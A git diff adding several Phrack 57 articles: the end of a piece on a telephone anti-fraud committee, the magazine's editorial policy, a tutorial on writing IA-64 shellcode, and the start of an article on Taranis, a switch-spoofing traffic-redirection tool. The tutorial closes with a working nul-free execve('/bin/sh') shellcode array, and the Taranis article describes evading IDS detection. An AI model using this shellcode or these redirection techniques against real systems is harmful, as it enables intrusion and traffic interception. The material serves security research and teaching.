+(e.g, ACM (Address Complete Message) and ANM (Answer Message)). When that
+information is received the originating switch has the option of including
+it within the originating AMA (Automatic Message Accounting) record of the
+call.
+
+An advantage of this would be that the information would move in real time
+between the companies involved. But this solution has some problems, it
+would require that all switches get enhanced, the AMA will have to change
+to make this possible and it doesn't take care of situations where SPI-type
+information is needed for numbers which are neither owned by the called 
+nor calling person.
+
+B. Non-Real Time Database Alternative
+With this alternative it is the idea that SPI information should be put 
+in
+one or more databases not directly connected to the processing of separate
+calls. The information could then be made available on request to the phone
+network some time after the call. The time between the call and the receipt
+of the SPI information can range from mere milliseconds up to weeks.
+
+This is actually an alright approach because only one (minor) problem gets
+created and only one problem remains. Everyone would have to agree who
+would be the third, independent, party to maintain the database. This
+alternative would not allow for SPI-based screening for call routing
+purposes.
+
+C. Network Database Alternative
+Sort of like the Switch-Based Alternative, this does real-time receiving
+and sending of SPI information when the call gets made. But the
+Switch-Based Alternative gets the SPI information from the switch. This
+alternative gets the information from an external database connected to 
+the
+network. SPI information would then by grabbed by IN (Intelligent Network)
+or AIN (Advanced Intelligent Network) queries when the call is made.
+The information could become part of one of the queries currently in use
+(LNP, LIDB and Toll Free for example) or a completely new query that gets
+handled by a separate SCP (Service Control Point).
+
+D. Non-Call Setup Network Alternative
+The idea behind this solution is that the SPI information still comes
+through network signalling but detached from the call setup portion.
+ONLS (Originating Line Number Screening) and GET DATA (SS7) messaging
+are a way to get information outside of the standard call setup.
+
+E. Phased SPI Implementation Alternative
+The NIIF analysed the other solutions and figures alternative C is the best
+way to go as it comes closest to the requirements of the system that is
+needed.
+Implementation of any alternative that provides SPI in a real-time way will
+have a serious impact on the phone network and it will take a long time
+before it is completely implemented.
+
+Not all carriers have a SPI right now, so an expedited solution must be
+found for their problems. The NIIF thinks a segmented implementation of 
+a 
+limited SPI capability with a non real-time database will be best. In the
+future the database could be enhanced.
+A phased approach that begins with including SPI information with a non
+real-time accessible line-level database appears to be possible to
+implement in the near future that gives a lot of the wanted attributes.
+
+The NIIF thinks it will be best if existing LIDB's get used as a database
+at first because a lot of the LIDB's will already contain an Account Owner
+field, are available to most facilities-bases service providers and may
+not require that much change.
+Problems with LIDB's are: Potential overload of LIDB queries.
+                          Inability to perform batch processing to do off
+                          hour downloads.
+                          Potential call delay set ups because of the
+                          higher amount of queries.
+
+
+[so what is it going to be?]
+Right now no final decision has been made, all this information has been
+sent to the OBF (Order & Billing Forum) to make a RFP (Request For Process)
+so a final decision can be made.
+By the sounds of things alternative E is probably going to be the "winner"
+in all of this.
+
+
+[miscellaneous information]
+The mailing address for the TFPC is(6)
+TFPC Secretary - ATIS
+1200 G St. NW Suite 500
+Washington, D.C. 20005
+
+Ofcourse the TFPC is not the only anti fraud initiative.
+A lot of telephony associations have a anti fraud section as well.
+I noticed that the following five were mentioned on quite a few websites 
+on
+telephone fraud. One such source was Agilent(10). Agilent is one of the
+members of the TFPC.
+http://www.cfca.org
+   - Communications Fraud Control Association (CFCA)
+http://www.asisonline.org
+   - American Society for Industrial Security (ASIS)
+http://www.htcia.org
+   - High Technology Crime Investigation Association (HTCIA)
+http://www.iir.com/nwccc/nwccc.htm
+   - National White Collar Crime Center (NWCCC)
+http://www.fraud.org
+   - National Fraud Information Center (NFIC)
+
+
+[conclusion]
+Judging by the amount of planning, who are members and the work found you
+can rest assured that once a decision is made all members will implement
+it.  This makes things harder for a phreak.
+As the discovery of a problem by one company gets shared with other
+companies even greater vigilance is needed by individuals who do not want
+word to get out about their tricks. 
+I do not think that committees like the TFPC will succeed in banning out
+all the mistakes in the telephony network. This article showed that with
+the introduction of a solution for one problem another potential problem
+opened. I am sure there are many more.
+
+
+[sources]
+(1) http://www.atis.org/atis/clc/tfpc/tfpc/tfpchom.htm
+    from "TFPC Guidelines v1.0" published February 2001,
+(2) found in section II, Mission Statement.
+    http://www.atis.org/pub/clc/tfpc/tfpcguidefinal201.pdf
+(3) according to a slide show taken from Nortel.com
+    called "Securing Your Net", presented by David Bench, Senior Staff
+    Manager-Industry Forums Liaison US Standards & industry forums team.
+    monitor.pdf and portability.pdf
+    I have lost the links so I have put them up at
+    http://www.emc2k.com/dhcorp/tfpc/monitor.pdf and
+    http://www.emc2k.com/dhcorp/tfpc/portability.pdf
+(4) from a overview of The Operator, volume I, number 10.
+    read in the letter from the editor section.
+    published October, 1992
+    http://www.whitaker.com/theoperator/opop0010.htm
+(5) from "TFPC Company Participants"
+    http://www.atis.org/atis/clc/tfpc/tfpclist.htm
+(6) Non-disclosure agreement
+    http://www.atis.org/pub/clc/tfpc/nondnew.pdf
+(7) as assumed by reading "2001 Funding fees for the TFPC"
+    http://www.atis.org/pub/clc/tfpc/tfpc2001fees.doc
+(8) History of decisions from 1998 until 2001 for issue 131
+    http://www.atis.org/pub/clc/niif/issues/0131.doc
+(9) The original link died. I put it up for people to view at
+    http://www.emc2k.com/dhcorp/tfpc/131strawr8.doc
+(10)The following URL is cut up a bit to fit properly.
+    http://www.agilent.com/cm/commslink/hub/issues/fraud/*CONNECT*
+    fraud_prevent_initiatives.html
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/4.txt b/phrack57/4.txt
new file mode 100644
index 0000000..4d0b31c
--- /dev/null
+++ b/phrack57/4.txt
@@ -0,0 +1,167 @@
+                            ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x04 of 0x12
+
+|=-------------------=[ THE PHRACK EDITORIAL POLICY ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ phrackstaff ]=----------------------------=|
+
+
+         "Scholars and academics naturally tend to believe that formal
+          knowledge is the most important way of knowing, and perhaps
+          they are right, yet even so it is not formal but common
+          knowledge which informs nearly all the day-to-day decisions
+          and actions people take, even the most learned among them."
+
+                       - William Gosling [Gosling, 1995]
+
+
+----|  1.  Introduction
+
+
+Because the editorship of Phrack has moved from being solely under the control
+of one person (route) to a group of "phrack staff", it is valuable to reiterate
+the editorial policy for the magazine.
+
+Please note that it is not the intention of this article to describe
+requirements for what we will or will not accept for publication.  The goal is
+to provide a number of pointers for authors which they will hopefully find
+useful when writing articles that they intend to submit.
+
+Firstly, we wish to stress that we are dedicated to continuing and improving 
+the reputation Phrack has for publishing interesting and original articles.
+
+Articles published in Phrack have always fulfilled two general criteria:
+
+1.  The research described in the article is original and new.
+
+2.  The article is well written.
+
+This has always been what Phrack is all about and it will remain that way.
+Each of the sections below describe things to keep in mind if you intend
+writing and submitting an article for the magazine.
+
+
+----|  2.  Subjects for Research
+
+
+We will never specify particular technology areas that authors should
+concentrate on.  What you choose to write about is entirely up to you, assuming
+of course that it is related in some way to information security!
+
+Many articles published in Phrack in the past have concentrated on an
+individual concept or an individual technology and we would like to see
+articles that combine concepts to create new ideas.  For example: distributed
+denial of service tools exist because of work done on network agents that can
+be remotely controlled.  What other ways can network agents be employed?
+Certainly for distributed password sniffing (roll your on Echelon...) and
+distributed network scanning, but also for worms and even as agents programmed
+to perform autonomous network penetration.  We are as interested in the
+evolution of existing ideas as we are in research on entirely new subjects.
+
+A good example of this type of thinking is the editorial written by route in
+Phrack 53.   His article describes the properties of server-centric attacks
+that most people are familiar with.  In addition however, he talks about
+client-centric attacks - an idea which only seems obvious in hindsight and that
+certainly deserves much more attention.
+
+
+----|  3.  Writing in Plain Language
+
+
+Multiple Phrack articles have been "put into plain language" for general
+consumption by third-parties such as online news outlets.  They have taken
+the ideas presented in Phrack articles and described them using language and
+analogies that their readers can understand.  With concepts such as
+distributed denial of service and buffer overflows it is not necessary for the
+reader to understand the subject at a very technical level in order to
+understand the underlying idea.
+
+It is a fact that as subject matter becomes more technically esoteric and
+complex the audience that can understand that type of information gets smaller
+and smaller.
+
+When writing about technical subjects it is tempting to write in highly
+technical language (and I admit that I am sometimes guilty of this myself), but
+please take into consideration the fact that the audience for Phrack is at
+varying levels of technical competence;  this is a fact of life.  In addition,
+many of the readers of Phrack may not have English as their first language and
+this makes it especially important that articles are clear so that we can
+maximize the readership.  There is no shame in writing in simple language.
+
+For these reasons we encourage submissions to Phrack to be written in language
+that is not excessively technical.  We appreciate however that this is 
+difficult to do when writing about subjects which are technical by their very 
+nature.
+
+
+----|  4.  Full Expansion of Ideas
+
+
+A good article becomes a great article when the idea being presented is carried
+through to its full and logical conclusion.
+
+For example: Phrack has published a number of articles on evading network-based
+intrusion detection systems (IDS).  Assuming that we have a new technique to
+document that allows us to bypass most IDS; of course the article must include
+a description of the theory behind the technique, but to make the article
+complete is should also include:
+
+*    A description of what fundamental mistake the designers of the IDS made to
+     allow the technique to work.
+
+*    A section in the article on what can be done to mitigate the risk of the
+     technique.  For example: a patch or a change in the way an IDS is deployed
+     or used.
+
+*    A discussion of other technologies that may be affected by similar
+     techniques.  For this example this could be firewall technology that
+     attempts to perform signature-based content analysis or even anti-virus
+     software based on a misuse-detection model.
+
+We encourage ideas to be presented fully and in a way that does not simply look
+at the technology in isolation.
+
+
+----|  5.  Using References
+
+
+Putting references to other pieces of work has become almost standard practice
+for Phrack articles.  This is a very good thing because it allows the reader to
+continue their research into the particular subject.
+
+At the end of your article, the list of references should include the author,
+the title, the date of the work, and also a URL for where it can be found
+online.  For example:
+
+[Stewart, 2000]  Andrew J. Stewart, "Distributed Metastasis: A Computer
+                 Network Penetration Methodology", September, 1999. http://www.
+                 securityfocus.com/data/library/distributed_metastasis.pdf
+
+In addition to references for related pieces of work, we would like to see
+references to any materials that you found useful when performing your research
+for the article.  This could include books, manuals, materials found online,
+and so on.
+
+Any suggestions that you may have for follow-on work should be included.
+Perhaps you are aware of a related technique that might work but have not had
+the time to investigate it: include this in your article.
+
+
+----|  6.  Conclusions
+
+
+This article should in no way be viewed as an attempt to force people into
+writing Phrack articles a certain way.  These are simply some observations
+about what has been done in the past and could possibly be improved upon in the
+future.  Happy writing!
+
+
+----|  7.  References
+
+
+[Gosling, 1995]  William Gosling, "Helmsmen and Heroes - Control Theory as a
+                 Key to Past and Future", 1994.
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/5.txt b/phrack57/5.txt
new file mode 100644
index 0000000..e50ef57
--- /dev/null
+++ b/phrack57/5.txt
@@ -0,0 +1,571 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x05 of 0x12
+
+|=-------------------=[ WRITING SHELLCODE FOR IA-64 ]=-------------------=|
+|=-----------=[ or: 'how to turn diamonds into jelly beans' ]------------=|
+|=--------------------=[ papasutra of haquebright ]=---------------------=|
+
+
+- Intro
+- Big Picture
+- Architecture
+  - EPIC
+  - Instructions
+  - Bundles
+  - Instruction Types and Templates
+  - Registers
+  - Register List
+  - Register Stack Engine
+  - Dependency Conflicts
+  - Alignment and Endianness
+  - Memory Protection
+  - Privilege Levels
+- Coding
+  - GCC IA-64 Assembly Language
+  - Useful Instruction List
+  - Optimization
+  - Coding Aspects
+- Example Code
+- References
+- Greetings
+
+
+--> Intro
+
+This paper outlines the techniques you need and the things I've
+learned about writing shellcode for the IA-64. Although the IA-64 is
+capable of executing IA-32 code, this is not topic of this paper.
+Example code is for Linux, but most of this applies to all operating
+systems that run on IA-64.
+
+
+--> Big Picture 
+
+IA-64 is the successor to IA-32, formerly called the i386
+architecture, which is implemented in all those PC chips like Pentium
+and Athlon and so on.
+It is developed by Intel and HP since 1994, and is available in the
+Itanium chip. IA-64 will probably become the main architecture for the
+Unix workstations of HP and SGI, and for Microsoft Windows. It is a 64
+bit architecture, and is as such capable of doing 64 bit integer
+arithmetic in hardware and addressing 2^64 bytes of memory. A very
+interesting feature is the parallel execution of code, for which a
+very special binary format is used.
+So lets get a little more specific.
+
+
+--> EPIC
+
+On conventional architectures, parallel code execution is made
+possible by the chip itself. The instructions read are analyzed,
+reordered and grouped by the hardware at runtime, and therefore only
+very conservative assumptions can be made.
+EPIC stands for 'explicit parallel instruction computing'. It works by
+grouping the code into independent parts at compile time, that is, the
+assembly code must already contain the dependency information.
+
+
+--> Instructions
+
+The instruction size is fixed at 41 bits. Each instruction is made up
+of five fields:
+
++-----------+-----------+-----------+-----------+-----------+
+| opcode    | operand 1 | operand 2 | operand 3 | predicate |
++-----------+-----------+-----------+-----------+-----------+
+| 40 to 27  | 26 to 20  | 19 to 13  | 12 to 6   | 5 to 0    |
++-----------+-----------+-----------+-----------+-----------+
+
+The large opcode space of 14 bits is used for specializing
+operations. For example, there are different branch instructions for
+branches that are taken often and ones taken seldomly. This extra
+information is then used in the branch prediction unit.
+
+There are three operand fields usable for immediate values or register
+numbers. Some instructions combine all three operand fields to a
+single 21 bit immediate value field. It is also possible to append a
+complete 41 bit instruction slot to another one to form a 64 bit
+immediate value field.
+
+The last field references a so called predicate register by a 6 bit
+number. Precicate registers each contain a single bit to represent the
+boolean values 'true' and 'false'. If the value is 'false' at
+execution time, the instruction is discarded just before it takes
+effect. Note that some instructions cannot be predicated.
+
+If a certain operation does not need a certain field in the scheme
+above, it is set to zero by the assembler. I tried to fill in other
+values, and it still worked. But this may not be the case for every
+instruction and every implementation of the IA-64 architecture. So be
+careful about this...
+Also note that there are some shortcut instructions such as mov, which
+for real is just an add operation with register 0 (constant 0) as the
+other argument.
+
+
+--> Bundles
+
+In the compiled code, instructions are grouped together to 'bundles'
+of three. Included in every bundle is a five bit template field that
+specifies which hardware units are needed for the execution.
+So what it boils down to is a bundle length of 128 bits. Nice, eh?
+
++-----------+----------+---------+----------+
+| instr 1   | instr 2  | instr 3 | template |
+|-----------+----------+---------+----------|
+| 127 to 87 | 86 to 46 | 45 to 5 | 4 to 0   |
++-----------+----------+---------+----------+
+
+Templates are used to dispatch the instructions to the different
+hardware units. This is quite straightforward, the dispatcher just has
+to switch over the template bits.
+
+Templates can also encode a so-called 'stop' after instruction slots.
+Stops are used to break parallel instruction execution, and you will
+need them to solve Data Flow Dependencies (see below). You can put a
+stop after every complete bundle, but if you need to save space, it is
+often better to stop after an instruction in the middle of a bundle.
+This does not work for every template, so you need to check the
+template table below for this.
+
+The independent code regions between stops are called instruction
+groups. Making use of the parallel semantics they carry, the Itanium
+for example is capable of executing up to two bundles at once, if
+there are enough execution units for the set of instructions specified
+in the templates. In the next implementations the numbers will be
+higher for sure.
+
+
+--> Instruction Types and Templates
+
+There are different instruction types, grouped by the hardware unit
+they need. Only certain combinations are allowed in a single bundle.
+Instruction types are A (ALU Integer), I (Non-ALU Integer), M
+(Memory), F (Floating Point), B (Branch) and L+X (Extended). The X
+slots may also contain break.i and nop.i for compatibility reasons.
+
+In the following template list, '|' is a stop:
+
+00 M I I
+01 M I I|
+02 M I|I     <- in-bundle stop
+03 M I|I|    <- in-bundle stop
+04 M L X
+05 M L X|
+06 reserved
+07 reserved
+08 M M I
+09 M M I|
+0a M|M I     <- in-bundle stop
+0b M|M I|    <- in-bundle stop
+0c M F I
+0d M F I|
+0e M M F
+0f M M F|
+10 M I B
+11 M I B|
+12 M B B
+13 M B B|
+14 reserved
+15 reserved
+16 B B B
+17 B B B|
+18 M M B
+19 M M B|
+1a reserved
+1b reserved
+1c M F B
+1d M F B|
+1e reserved
+1f reserved
+
+
+--> Registers
+
+This is not a comprehensive list, check [1] if you need one.
+
+IA-64 specifies 128 general (integer) registers (r0..r127). There are
+128 floating point registers, too (f0..f127).
+
+Predicate Registers (p0..p63) are used for optimizing runtime
+decisions. For example, 'if' results can be handled without branches
+by setting a predicate register to the result of the 'if', and using
+that predicate for the conditional code. As outlined above, predicate
+registers are referenced by a field in every instruction. If no
+register is specified, p0 is filled in by the assembler. p0 is always
+'true'.
+
+Branch Registers (b0..b7) are used for indirect branches and
+calling. Branch instructions can only handle branch registers. When
+calling a function, the return address is stored in b0 by
+convention. It is saved to local registers by the called function if
+it needs to call other functions itself.
+
+There are the special registers Loop Count (LC) and Epilogue Count
+(EC). Their use is explained in the optimization chapter.
+
+The Current Frame Marker (CFM) holds the state of the register
+rotation. It is not accessible directly. The Instruction Pointer (IP)
+contains the address of the bundle that is currently executed.
+
+The User Mask (UM):
++-------+-------------------------------------------------------------+
+| flag  | purpose                                                     |
++-------+-------------------------------------------------------------+
+| UM.be | set this to 1 for big endian data access                    |
+| UM.ac | if this is 0, Unaligned Memory Faults are raised only if    |
+|       | the situation cannot be handled by the processor at all     |
++-------+-------------------------------------------------------------+
+The User Mask can be modified from any privilege level (see below).
+
+Some interesting Processor Status Register (PSM) fields:
++---------+-----------------------------------------------------------+
+| flag    | purpose                                                   |
++---------+-----------------------------------------------------------+
+| PSR.pk  | if this is 0, protection key checks are disabled          |
+| PSR.dt  | if this is 0, physical addressing is used for data        |
+|         | access; access rights are not checked.                    |
+| PSR.it  | if this is 0, physical addressing is used for instruction |
+|         | access; access rights are not checked.                    |
+| PSR.rt  | if this is 0, the register stack translation is disabled  |
+| PSR.cpl | this is the current privilege level. See its chapter for  |
+|         | details.                                                  |
++---------+-----------------------------------------------------------+
+All but the last of these fields can only be modifiled from privilege
+level 0 (see below).
+
+
+--> Register List
+
++---------+------------------------------+
+| symbol  | Usage Convention             |
++---------+------------------------------+
+| b0      | Call Register                |
+| b1-b5   | Must be preserved            |
+| b6-b7   | Scratch                      |
+| r0      | Constant Zero                |
+| r1      | Global Data Pointer          |
+| r2-r3   | Scratch                      |
+| r4-r5   | Must be preserved            |
+| r8-r11  | Procedure Return Values      |
+| r12     | Stack Pointer                |
+| r13     | (Reserved as) Thread Pointer |
+| r14-r31 | Scratch                      |
+| r32-rxx | Argument Registers           |
+| f2-f5   | Preserved                    |
+| f6-f7   | Scratch                      |
+| f8-f15  | Argument/Return Registers    |
+| f16-f31 | Must be preserved            |
++---------+------------------------------+
+Additionaly, LC must be preserved.
+
+
+--> Register Stack Engine
+
+IA-64 provides you with a register stack. There is a register frame,
+consisting of input (in), local (loc), and output (out) registers. To
+allocate a stack frame, use the 'alloc' instruction (see [1]). When a
+function is called, the stack frame is shifted, so that the former
+output registers become the new input registers. Note that you need to
+allocate a stack frame even if you only want to access the input
+registers.
+
+Unlike on SPARC, there are no 'save' and 'restore' instructions needed
+in this scheme. Also, the (memory) stack is not used to pass arguments
+to functions. 
+
+The Register Stack Engine also provides you with register
+rotation. This makes modulo-scheduling possible, see the optimization
+chapter for this. The 'alloc' described above specifies how many
+general registers rotate, the rotating region always begins at r32,
+and overlaps the local and output registers. Also, the predicate
+registers p16 to p63 and the floating point register f32 to f127
+rotate.
+
+
+--> Dependency Conflicts
+
+Dependency conflicts are formally classified into three categories:
+
+- Control Flow Conflicts
+
+These occur when assumptions are made if a branch is taken or not.
+For example, the code following a branch instruction must be discarded
+when it is taken. On IA-64, this happens automatically. But if the
+code is optimized using control speculation (see [1]), control flow
+conflicts must be resolved manually. Hardware support is provided.
+
+- Memory Conflicts
+
+The reason for memory conflicts is the higher latency of memory
+accesses compared to register accesses. Memory access is therefore
+causing the execution to stall. IA-64 introduces data speculation (see
+[1]) to be able to move loads to be executed as early as possible in
+the code.
+
+- Data Flow Conflicts
+These occur when there are instructions that share registers or memory
+fields in a block marked for parallel execution. This leads to
+undefined behavior and must be prevented by the coder. This is the
+type of conflict that will bother you the most, especially when trying
+to write compact code!
+
+
+--> Alignment and Endianess
+
+As on many other architectures, you have to align your data and
+code. On IA-64, code must be aligned on 16 byte boundaries, and is
+stored in little endian byte order. Data fields should be aligned
+according to their size, so an 8 bit char should be aligned on 1 byte
+boundaries. There is a special rule for 10 byte floating point numbers
+(should you ever need them), that is you have to align it on 16 byte
+boundaries. Data endianess is controlled by the UM.be bit in the user
+mask ('be' means big endian enable). On IA-64 Linux, little endian is
+default.
+
+
+--> Memory Protection
+
+Memory is divided into several virtual pages. There is a set of
+Protection Key Registers (PKR) that contain all keys required for a
+process. The Operating System manages the PKR. Before memory access is
+permitted, the key of the respective memory field (which is stored in
+the Translation Lookaside Buffer) is compared to all the PKR keys. If
+none matches, a Key Miss fault is raised. If there is a matching key,
+it is checked for read, write and execution rights. Access
+capabilities are calculated from the key's access rights field, the
+privilege level of the memory page and the current privilege level
+of the executing code (see [1] for details). If an operation is to be
+performed which is not covered by the calculated capabilities, a Key
+Permission Fault is generated.
+
+
+--> Privilege Levels
+
+There are four privilege levels numbered from 0..3, with 0 being the
+most privileged one. System instructions and registers can only be
+called from level 0. The current privilege level (CPL) is stored in
+PSR.cpl. The following instructions change the CPL:
+
+- enter privileged code (epc)
+The epc instruction sets the CPL to the privilege level of the page
+containing the epc instruction, if it is numerically higher than the
+CPL. The page must be execute only, and the CPL must not be
+numerically lower than the previous privilege level.
+
+- break
+'break' issues a Break Instruction Fault. As every instruction fault
+on IA-64, this sets the CPL to 0. The immediate value stored in the
+break encoding is the address of the handler.
+
+- branch return
+This resets the CPL to previous value.
+
+
+--> GCC IA-64 Assembly Language
+
+As you should have figured out by now, assembly language is normally
+not used to program a chip like this. The optimization techniques are
+very difficult for a programmer to exploit by hand (although possible
+of course). Assembly will always be used to call some processor ops
+that programming languanges do not support directly, for algoritm
+coding, and for shellcode of course.
+
+The syntax basically works like this:
+(predicate_num) opcode_name operand_1 = operand_2, operand_3
+Example:
+(p1) fmul f1 = f2, f3
+
+As mentioned in the instruction format chapter, sometimes not all
+operand fields are used, or operand fields are combined.
+Additionally, there are some instructions which cannot be predicated.
+
+Stops are encoded by appending ';;' to the last instruction of an
+instruction group. Symbolic names are used to reference procedures, as
+always.
+
+
+--> Useful Instruction List
+
+Although you will have to check [3] in any case, here are a very few
+instructions you may want to check first:
++--------+------------------------------------------------------------+
+| name   | description                                                |
++--------+------------------------------------------------------------+
+| dep    | deposit an 8 bit immediate value at an arbitrary position  |
+|        | in a register                                              |
+| dep    | deposit a portion of one reg into another                  |
+| mov    | branch register to general register                        |
+| mov    | max 22 bit immediate value to general register             |
+| movl   | max 64 bit immediate value to general register             |
+| adds   | add short                                                  |
+| branch | indirect form, non-call                                    |
++--------+------------------------------------------------------------+
+
+
+--> Optimizations
+
+There are some optimization techniques that become possible on
+IA-64. However because the topic of this paper is not how to write
+fast code, they are not explained here. Check [5] for more information
+about this, especially look into Modulo Scheduling. It allows you to
+overlap multiple iterations of a loop, which leads to very compact
+code.
+
+
+--> Coding Aspects
+
+Stack: As on IA-32, the stack grows to the lower memory
+addresses. Only local variables are stored on the stack.
+
+System calls: Although the epc instruction is meant to be used
+instead, Linux on IA-64 uses Break Instruction Faults to do a system
+call. According to [6], Linux will switch to epc some day, but this
+has not yet happened. The handler address used for issuing a system
+call is 0x100000. As stated above, break can only use immediate values
+as handler addresses. This introduces the need to construct the break
+instruction in the shellcode. This is done in the example code below.
+
+Setting predicates: Do that by using the compare (cmp)
+instructions. Predicates might also come handy if you need to fill
+some space with instructions, and want to cancel them out to form
+NOPs.
+
+Getting the hardware: Check [2] or [7] for experimenting with IA-64,
+if you do not have one yourself.
+
+
+--> Example Code
+
+<++> ia64-linux-execve.c !f4ed8837
+/*
+ * ia64-linux-execve.c
+ * 128 bytes.
+ *
+ *
+ * NOTES:
+ *
+ * the execve system call needs:
+ * - command string addr in r35
+ * - args addr in r36
+ * - env addr in r37
+ *
+ * as ia64 has fixed-length instructions (41 bits), there are a few
+ * instructions that have unused bits in their encoding.
+ * i used that at two points where i did not find nul-free equivalents.
+ * these are marked '+0x01', see below.
+ *
+ * it is possible to save at least one instruction by loading bundle[1]
+ * as a number (like bundle[0]), but that would be a less interesting
+ * solution.
+ *
+ */
+
+unsigned long shellcode[] = {
+
+  /* MLX
+   * alloc r34 = ar.pfs, 0, 3, 3, 0   // allocate vars for syscall
+   * movl r14 = 0x0168732f6e69622f    // aka "/bin/sh",0x01
+   * ;; */
+  0x2f6e458006191005,
+  0x631132f1c0016873,
+
+  /* MLX
+   * xor r37 = r37, r37               // NULL
+   * movl r17 = 0x48f017994897c001    // bundle[0]
+   * ;; */
+  0x9948a00f4a952805,
+  0x6602e0122048f017,
+
+  /* MII
+   * adds r15 = 0x1094, r37           // unfinished bundle[1]
+   * or r22 = 0x08, r37               // part 1 of bundle[1]
+   * dep r12 = r37, r12, 0, 8         // align stack ptr
+   * ;; */
+  0x416021214a507801,
+  0x4fdc625180405c94,
+
+  /* MII
+   * adds r35 = -40, r12              // circling mem addr 1, shellstr addr
+   * adds r36 = -32, r12              // circling mem addr 2, args[0] addr
+   * dep r15 = r22, r15, 56, 8        // patch bundle[1] (part 1)
+   * ;; */
+  0x0240233f19611801,
+  0x41dc7961e0467e33,
+
+  /* MII
+   * st8 [r36] = r35, 16              // args[0] = shellstring addr
+   * adds r19 = -16, r12              // prepare branch addr: bundle[0] addr
+   * or r23 = 0x42, r37               // part 2 of bundle[1]
+   * ;; */
+  0x81301598488c8001,
+  0x80b92c22e0467e33,
+
+  /* MII
+   * st8 [r36] = r17, 8               // store bundle[0]
+   * dep r14 = r37, r14, 56, 8        // fix shellstring
+   * dep r15 = r23, r15, 16, 8        // patch bundle[1] (part 2)
+   * ;; */
+  0x28e0159848444001,
+  0x4bdc7971e020ee39,
+
+  /* MMI
+   * st8 [r35] = r14, 25              // store shellstring
+   * cmp.eq p2, p8 = r37, r37         // prepare predicate for final branch.
+   * mov b6 = r19                     // (+0x01) setup branch reg
+   * ;; */
+  0x282015984638c801,
+  0x07010930c0701095,
+
+  /* MIB
+   * st8 [r36] = r15, -16             // store bundle[1]
+   * adds r35 = -25, r35              // correct string addr
+   * (p2) br.cond.spnt.few b6         // (+0x01) branch to constr. bundle
+   * ;; */
+  0x3a301799483f8011,
+  0x0180016001467e8f,
+};
+
+/*
+ * the constructed bundle
+ *
+ * MII
+ * st8 [r36] = r37, -8                // args[1] = NULL
+ * adds r15 = 1033, r37               // syscall number
+ * break.i 0x100000
+ * ;;
+ *
+ * encoding is:
+ * bundle[0] = 0x48f017994897c001
+ * bundle[1] = 0x0800000000421094
+ */
+<-->
+
+--> References
+
+[1] HP IA-64 instruction set architecture guide
+    http://devresource.hp.com/devresource/Docs/Refs/IA64ISA/
+[2] HP IA-64 Linux Simulator and Native User Environment
+    http://www.software.hp.com/products/LIA64/
+[3] Intel IA-64 Manuals
+    http://developer.intel.com/design/ia-64/manuals/
+[4] Sverre Jarp: IA-64 tutorial
+    http://cern.ch/sverre/IA64_1.pdf
+[5] Sverre Jarp: IA-64 performance-oriented programming
+    http://sverre.home.cern.ch/sverre/IA-64_Programming.html
+[6] A presentation about the Linux port to IA-64
+    http://linuxia64.org/logos/IA64linuxkernel.PDF
+[7] Compaq Testdrive Program
+    http://www.testdrive.compaq.com
+
+The register list is mostly copied from [4]
+
+
+--> Greetings
+
+palmers, skyper and scut of team teso
+honx and homek of dudelab
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/6.txt b/phrack57/6.txt
new file mode 100644
index 0000000..b157be6
--- /dev/null
+++ b/phrack57/6.txt
@@ -0,0 +1,216 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x06 of 0x12
+
+|=-------------------------=[ T A R A N I S ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ Jonathan Wilkins ]=-------------------------=|
+
+
+Taranis
+-------
+Code by Jonathan Wilkins <jwilkins@bitland.net>
+Original concept by Jesse <jesse@bitland.net>.
+Thanks to Skyper <skyper@segfault.net> for his assistance
+
+URL: http://www.bitland.net/taranis
+
+Summary
+-------
+Taranis redirects traffic on switch hardware by sending spoofed ethernet 
+traffic.  This is not the same as an ARP poisoning attack as it affects
+only the switch, and doesn't rely on ARP packets.  Plus, it is virtually
+invisible because the packets it sends aren't seen on any other port on
+the switch.  Evading detection by an IDS that may be listening on a 
+monitoring port is as simple as changing the type of packet that is sent 
+by the packet spoofing thread.
+
+How it works
+------------
+First, some history.  Back in the old days, we had 10base5, or thick Ethernet.
+The 10 prefix meant that it was 10 Megabit and the 5 postfix indicated that
+the maximum cable length was 500 meters.  It used a coaxial cable, much like 
+cable TV uses. (The difference is in the maximum impedence of the cable, TV 
+cable is 75 ohm, ethernet is 50 ohm)  Coaxial cable consists of a central wire 
+which is surrounded by a layer of insulator, which is enclosed in a shield 
+made of thin stranded wire.  This is all encased in another thinner insulating 
+layer.  A thick Ethernet network had a shared backplane and then a series of 
+trancievers that plugged into it.  If the shared portion of the cable broke,
+or rodents happened to chew through it, then the entire network went down.
+Since the cable was usually strung throughout the ceiling and walls it was 
+quite inconvenient to fix.  Long runs of cable had to be augmented by a 
+repeater, which was just a little device that boosted the signal strength.
+
+A 10base5 network looked something like this:
+
+             Shared backplane
+ X-+------+------+------+------+------+-X  (+ - Tranciever)
+   |      |      |      |      |      |    (X - Terminator)
+   |      |      |      |      |      | 
+ Host   Host   Host   Host   Host   Host
+   A      B      C      D      E      F
+
+This was replaced by thin Ethernet (10base2, which means that it was 10Mbit and
+had a maximum cable length of 200 meters)), which was based on a shared 
+cable but didn't require trancievers and so was less expensive.  (10base2 was
+also known as cheapernet)  It was also vulnerable to the rodent attack.
+
+10base2 looked something like this:
+
+ X------.------.------.------.------.------X 
+      Host   Host   Host   Host   Host
+        A      B      C      D      E
+
+         (X - terminator which is just a 50 ohm resistor)
+         (. - BNC Connector, T shaped piece of metal that
+              connected two pieces of cable with a computer)
+
+Then came 10baseT, or Twisted Pair Ethernet.  This was based around a star
+topology.  The reason for the name is clear when you see a diagram.
+
+Host A     Host B      Host C
+  |          |           |
+  \________  |  ________/
+           \ | /
+       Switch or Hub
+           / | \
+  /~~~~~~~~  |  ~~~~~~~~\
+Host D     Host E      Host F
+
+Now if rats happened to chew through a network cable, only one computer would 
+lose network connectivity.  If a giant rat happened to eat the network hub, 
+it was easy to crimp new ends on the twisted pair cable and buy a new hub.
+
+An Ethernet Frame header looks like this:
+
+|    |    |    |    |    |    |    |    |    |    |    |    |    |    |
+0                             6                             11        13
+Bytes 0-5   are the Destination Address
